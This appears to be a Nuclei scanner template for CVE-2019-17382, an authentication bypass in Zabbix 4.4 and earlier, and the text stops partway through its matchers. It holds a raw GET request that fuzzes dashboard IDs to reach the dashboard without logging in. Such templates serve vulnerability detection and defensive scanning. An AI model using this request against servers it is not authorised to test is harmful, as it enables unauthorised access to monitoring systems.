id: CVE-2019-17382 info: name: Zabbix <=4.4 - Authentication Bypass author: harshbothra_ severity: critical description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin. reference: - https://www.exploit-db.com/exploits/47467 - https://www.cvedetails.com/cve/CVE-2019-17382/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2019-17382 cwe-id: CWE-639 tags: cve,cve2019,zabbix,fuzz,auth-bypass,login requests: - raw: - | GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1 Host: {{Hostname}} payloads: ids: helpers/wordlists/numbers.txt threads: 50 stop-at-first-match: true matchers-condition: and matchers: - type: word words: - "